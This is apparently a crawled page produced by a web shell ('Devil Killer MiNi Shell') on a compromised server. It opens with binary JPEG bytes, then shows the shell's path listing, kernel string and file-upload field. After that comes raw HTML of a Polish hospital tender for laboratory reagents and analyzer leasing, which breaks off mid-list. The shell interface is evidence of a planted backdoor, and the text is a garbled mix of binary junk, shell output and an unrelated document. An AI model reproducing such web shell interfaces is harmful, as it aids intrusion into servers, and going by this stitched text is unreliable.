JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240614/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240614/0036680601-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Sukcesywne dostawy odczynników wraz z dzierżawą aparatów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Samodzielny Publiczny Zakład Opieki Zdrowotnej Warszawa Wola-Śródmieście</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 001018396</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Ciołka 11</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">01-445</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">eliza.milecka@zozwola.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zozwola.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - samodzielny publiczny zakład opieki zdrowotnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Sukcesywne dostawy odczynników wraz z dzierżawą aparatów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c29f63cf-2976-11ef-b373-0e435a8a43bc</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00366806</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-06-14</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00576376/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.11 Dostawa odczynników do immunochemii wraz z dzierżawą analizatora</p> <p class="mb-0">1.2.14 Dostawa odczynników do bakteriologii wraz z dzierżawą analizatora</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zozwolasrodmiescie.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zozwolasrodmiescie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym, a Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania poprzez kafelek „Wiadomości” kierujący do modułu korespondencji.<br/>1.	Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania teleinformatycznego Platforma zakupowa pod nr tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>2.	Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/>2.3.	dokumenty w formacie „pdf&#34; zaleca się podpisywać formatem PAdES,<br/>2.4.	dopuszcza się podpisanie dokumentów w formacie innym niż „pdf&#34;, wtedy będzie wymagany oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć prócz podpisanego dokumentu oddzielny plik z podpisem.<br/>3.	Zamawiający określa niezbędne wymagania sprzętowo - aplikacyjne umożliwiające pracę na Platformie Zakupowej tj.:<br/>3.3.	Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>3.4.	Komputer klasy PC lub MAC spełniający wymagania zainstalowanego systemu operacyjnego oraz wymagania używanej przeglądarki internetowej;<br/>3.5.	Zainstalowana dowolna przeglądarka internetowa w wersji wspieranej przez producenta obsługująca TLS 1.2;<br/>3.6.	Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>4.	Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 2 GB w txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.<br/>5.	Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj.:<br/>5.3.	Plik załączony przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie, jako zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez Zamawiającego po upływie terminu otwarcia ofert.<br/>6.	Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z Głównym Urzędem Miar, który udostępnia poprzez Internet usługę umożliwiającą synchronizację czasu w systemach komputerowych z czasem urzędowym obowiązującym w Polsce.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">24/2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">3</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia dla pakietu/ części nr 1 są sukcesywne dostawy do immunochemii: odczynników, kalibratorów, kontroli, materiałów eksploatacyjnych wraz z dzierżawą analizatora i podłączeniem analizatora do systemu Marcel.<br/>1.	Opis przedmiotu zamówienia został zawarty w Załączniku nr 2.1 do swz (formularz asortymentowo-cenowy zawierający rodzaj i ilości przedmiotu zamówienia) i w Załączniku nr 2.1A do SWZ (wymagane parametry minimalne analizatora). <br/>Lp. Nazwa badania	i szacunkowa ilość badań na 36 m-cy<br/>1.	Testosteron	3200<br/>2.	Estradiol	2200<br/>3.	Progesteron	1000<br/>4.	FSH	2100<br/>5.	LH	1400<br/>6.	Toxo IgM	1400<br/>7.	Toxo IgG	1100<br/>8.	Odra IgG	300<br/>9.	HIV 1400<br/>10.	D-Dimer	2400<br/>11.	Różyczka IgG	800<br/>12.	Różyczka IgM	800<br/>13.	Borelioza IgG	1500<br/>14.	BoreliozaIgM	1500<br/>15.	EBV IgG	200<br/>16.	EBV IgM	200<br/>17.	SARS-COV-IgM	200<br/>18.	SARS-COV-IgG	200<br/>	Kontrole, kalibratory, materiały eksploatacyjne niezbędne do prawidłowej pracy analizatora. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Pakiet nr 2: Sukcesywne dostawy do bakteriologii - podłoża, odczynniki, szczepy kontrolne, testy <br/>i krążki<br/><br/>1.	Opis przedmiotu zamówienia został zawarty w Załączniku nr 2.2 do swz (formularz asortymentowo-cenowy zawierający rodzaj i ilości przedmiotu zamówienia) i Załączniku nr 2.2A do SIWZ (szczegółowy opis przedmiotu zamówienia określający wymagania Zamawiającego odnośnie przedmiotu zamówienia).<br/>Lp.	Artykuł<br/>	Jed.op	Ilość testów<br/>1	Microbank-sterylne fiolki w 4 różnych kolorach	60-100 fiolek w 4 różnych kolorach	3 opakowania<br/>2	Agarek amerykański do przechowywania szczepów	20 probówek<br/>w op.	3 opakowania<br/>3	10% KOH	butelka-100ml	3<br/>4	Kwas fenyloboronowy	Probówka 2 ml	15 probówek<br/>5	EDTA	butelka-100ml/probówki 2ml	2 butelki/100 probówek<br/>6	Bulion tryptozowo-sojowy	butelka -200ml lub probówki 10 ml	180 butelek/3600 probówek<br/>7	Bulion Salmonella SF	butelka-200ml lub probówki 10 ml	10 butelek/200 probówek<br/>8	Bulion Todd-Hewitt z antybiotykiem do namnażania i różnicowania paciork.	probówka-5ml	50 probówek<br/>9	Enterococcogel -wybiórcza izolacja i różnicowanie paciorkowców grupy D, płytki	1op-10szt	15 opakowań<br/>10	Podłoże MacConkey z fioletem krystalicznym	1op-10szt	3000 ( 300 opakowań)<br/>11	Podłoże Columbia Agar z 5% krwią baranią	1op-10szt	6000 (600 opakowań)<br/>12	Podłoże Haemophilus	1op 10szt	2200 (220 opakowań)<br/>13	Agar czekoladowy do izolacji bakterii o wysokich wymaganiach odżywczych z Poly Vitexem	1op-10szt	40 (4 opakowania)<br/>14	Podłoże Columbia CNA Agar	1op-10szt	2800 (280 opakowań)<br/>15	Podłoże Mueller Hinton Agar z 5% krwią końską MHF	1op-10szt	3000 (300 opakowań)<br/>16	Podłoże MH II Agar	1op-10szt	6000 (600 opakowań)<br/>17	Podłoże Sabouraud z chloramfenikolem	1op-10szt	1500 (150 opakowań)<br/>18	Podłoże Sabouraud z chloramfenikolem i gentamycyną<br/>	1 op-10szt	1000 (100 opakowań)<br/>19	Podłoże Sabouraud z chloramfenikolem i aktidionem	1op-10szt	1000 (100 opakowań)<br/>20	Podłoże Chapmana	1op -10 szt	400 (40 opakowań)<br/>21	Chromagar MRSA-podłoże wybiórcze do izolacji sczepów S.aureus opornych na metycylinę	1op-10szt	20<br/>(2 opakowania)<br/>22	Podłoże chromogenne do izolacji Enterococcus opornych na wankomycynę	1op-10szt	20<br/>(2 opakowania)<br/>23	Podłoże Yersinia	1op-10 szt	30 (3 opakowania)<br/>24	Podłoże do wybiórczej izolacji Listeria monocytogenes	1op-10szt	20 <br/>(2 opakowania)<br/>25	Lateksowy test aglutynacyjny do identyfikacji gronkowców z koagulazą zwiazaną białkiem A<br/>	1 op na ok 50 oznaczeń	30 opakowań<br/>26	Lateksowy test aglutynacyjny do identyfikacji Streptococcus grupy A,B,C,D,G,F z możliwością zakupu uzupełniających odczynników i enzymu<br/>	1op-ok 60 oznaczeń	10 opakowań<br/>27	Enzym butelka butelka 10ml,1 op-2x10 ml	6<br/>28	Odczynnik a butelka 2,5ml	3<br/>29	Odczynnik b	butelka 2,5ml	6<br/>30	Odczynnik c	butelka 2,5 ml	3<br/>31	Odczynnik d<br/><br/>	butelka 2,5ml	3<br/>32	Immunologiczny test do jakościowy do wykrywania karbapenemaz-5klas(KPC,OXA,VIM,IMP,NDM)<br/><br/><br/>	20-25 testów	4 opakowania<br/>33	Zestaw do identyfikacji i oznaczania lekowrażliwości grzybów drożdżopodobnych z nystatyną i clotrimazolem<br/>	20-25 testów	4<br/><br/>34	E.coli ATCC 25922 3<br/>35	E.coli ATCC 35218 3<br/>36	Pseudomonas aeruginosa ATCC 27853 3<br/>37	Haemophilus influenzae ATCC 49766 3<br/>38	Klebsiella pneumoniae ATCC 700603 3<br/>39	H.influenzae ATCC 49247 3<br/>40	S.aureus ATCC 29213 3<br/>41	S.aureus NCTC 12493 3<br/>42	Enterococcus faecalis ATCC29212 3<br/>43	Enterococcus feacalis ATCC 51299 3<br/>44	Streptococcus pneumoniae ATCC 49619 3<br/>Krążki do identyfikacji,różnicowania i lekowrażliwości<br/>45	Krążki do identyfikacji S.saprophiticus z nowobiocyną N<br/>	fiolka-50 krążków	1<br/>46	Krążki z furazolidonem do różnicowania bakterii z rodzaju Staphylococcus od Micrococcus	fiolka-50 krążków	1<br/>47	Krążki BC do różnicowania bakterii z rodz. Moraxella od Neisseria	fiolka-50 krążków	1<br/>48	Krążki EF-do różnicowania szczepów E.faecalis od faecium<br/>	fiolka-50 krążków	4<br/>49	Krążki bibułowe do wykrywania obecności beta-laktamazy z nitrocefiną	fiolka-50 krążków	2<br/>50	Krążki bibułowe lub paski do różnicowania drobnoustrojów na oksydazo-ujemne i oksydazo-dodatnie	fiolka-50 krążków/lub 50 pasków	2<br/>51	Optochina -krążki do identyfikacji S.pneumoniae	fiolka-50 krążków	1<br/>52	Ampicylina10µg	fiolka-50 krążków,	40 fiolek<br/>53	Ampicylina 2µg	fiolka-50 krążków	40 fiolek<br/>54	Ampicylina/sulbaktam (10/10)20µg	fiolka-50 krążków	10 fiolek<br/>55	Amoksycylina/kwas klawulanowy (20/10)µg	fiolka-50 krążków	30 fiolek<br/>56	Amoksycylina/kwas klawulanowy (2/1)µg	fiolka-50 krążków	28 fiolek<br/>57	Amikacyna 30µg	fiolka-50 krążków	20 fiolek<br/>58	Cefepime 30µg	fiolka-50 krążków	8 fiolek<br/>59	Cefoksytyna 30µg	fiolka-50 krążków	40 fiolek<br/>60	Cefotaksym 30µg	fiolka-50 krążków	4 fiolki<br/>61	Cefotaksym 5µg	fiolka-50 krążków	4 fiolki<br/>62	Ceftazydym 30µg	fiolka-50 krążków	4 fiolki<br/>63	Ceftazydym 10µg	fiolka-50 krążków	4 fiolki<br/>64	Ceftibuten 30µg	Fiolka-50 krążkó	8 fiolek<br/>65	Ceftriakson 30µg	fiolka-50 krążków	4 fiolki<br/>66	Cefuroksim 30µg	fiolka-50 krążków	40 fiolek<br/>67	Chloramfenikol 30µg	fiolka-50 krążków	12 fiolek<br/>68	Ciprofloksacyna 5µg	fiolka-50 krążków	48 fiolek<br/>69	Clotrimazol 10µg	Fiolka – 50 krążków	16 fiolek<br/>70	Ertapenem 10µg	fiolka-50 krążków	4 fiolki<br/>71	Erytromycyna 15µg	fiolka-50 krążków	60 fiolek<br/>72	Gentamycyna 10µg	fiolka-50 krążków	40 fiolek<br/>73	Gentamycyna 30µg	fiolka-50 krążków	16 fiolek<br/>74	Imipenem 10µg	fiolka-50 krążków	20 fiolek<br/>75	Klindamycyna 2µg	fiolka-50 krążków	60 fiolek<br/>76	Kwas fusydowy 10µg	fiolka-50 krążków	8 fiolek<br/>77	Lewofloksacyna 5µg	fiolka-50 krążków	24 fiolki<br/>78	Linezolid 10µg	fiolka-50 krążków	3 fiolki<br/>79	Meropenem 10µg	fiolka-50 krążków<br/>	20 fiolki<br/>80	Nitrofurantoina 100µg	fiolka-50 krążków	50 fiolek<br/>81	Nystatyna 100	Fiolka-50 krążków	4 fiolki<br/>82	Norfloksacyna 10µg	fiolka-50 krążków	30 fiolek<br/>83	Oksacylina 1µg	fiolka-50 krążków	8 fiolek<br/>84	Pefloksacyna 5µg	fiolka-50 krążków	4 fiolki<br/>85	Penicylina G ( benzylowa)1UI	fiolka-50 krążków	40 fiolek<br/>86	Piperacylina/tazobaktam (30/6)36µg	fiolka-50 krążków	30 fiolek<br/>87	Rifampicyna 5µg	fiolka-50 krążków	4 fiolki<br/>88	Sulfometoksazol/<br/>trimetoprim (1:19)25µg	fiolka-50 krążków	60 fiolek<br/>89	Tobramycyna 10µg	fiolka-50 krążków	60 fiolek<br/>90	Tetracyklina 30µg	fiolka-50 krążków	16 fiolek<br/>91	Temocylina 30µg	fiolka-50 krążków	2 fiolki<br/>92	Tigecyklina 15µg	fiolka-50 krążków	2 fiolki<br/>93	Trometamol fosfomycyny 200µg	fiolka-50 krążków	50 fiolek<br/>94	Vancomycyna 5µg	fiolka-50 krążków	2 fiolki<br/>95	Streptomycyna 300µg	fiolka-50 krążków	12 fiolek<br/>96	Czyste krążki bibułowe sterylne	fiolka-50 krążków	4 fiolki<br/>97	Aztreonam 30µg	Fiolka-50 krążków	2 fiolki<br/>98	Ceftazidime30µg + Acid Clav	Fiolka-50 krążków	2 fiolki<br/>99	Mecylinam 10µg	Fiolka-50 krążków	1 fiolka<br/>100	Nitroxoline 30µg	Fiolka-50 krążków	1 fiolka<br/>101	Ceftarolina 5µg	Fiolka-50 krążków	1 fiolka<br/>Surowice do identyfikacji Salmonella<br/>102	Surowica do identyfikacji Salmonella poliwalentna HM	1 but 5ml	4<br/>103	Surowica AO	1 but 5ml	4<br/>104	Surowica BO	1 but 5ml	4<br/>105	Surowica CO	1 but 5ml	4<br/>106	Surowica DO	1 but 5ml	4<br/>107	Surowica EO	1 but 5ml	4 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33696500-0 - Odczynniki laboratoryjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">36 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin płatności</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Sukcesywne dostawy do bakteriologii – podłoża chromogenne, barwniki, e-testy, testy wraz z dzierżawą automatycznego aparatu do identyfikacji drobnoustrojów<br/><br/>1.	Opis przedmiotu zamówienia został zawarty w Załączniku nr 2.3 do swz (formularz asortymentowo-cenowy zawierający rodzaj i ilości przedmiotu zamówienia) i Załączniku nr 2.3A do SWZ (szczegółowy opis przedmiotu zamówienia określający wymagania Zamawiającego odnośnie przedmiotu zamówienia).<br/>Lp.	Artykuł<br/>	Jed.op	Ilość testów<br/>1	Podłoże chromogenne do wstępnej identyfikacji Salmonella sp. 600<br/>2	Podłoże chromogenne do izolacji S.agalactiae 1200<br/>3	Podłoże chromogenne ESBL 40<br/>4	Podłoże chromogenne KPC<br/> 40<br/>5	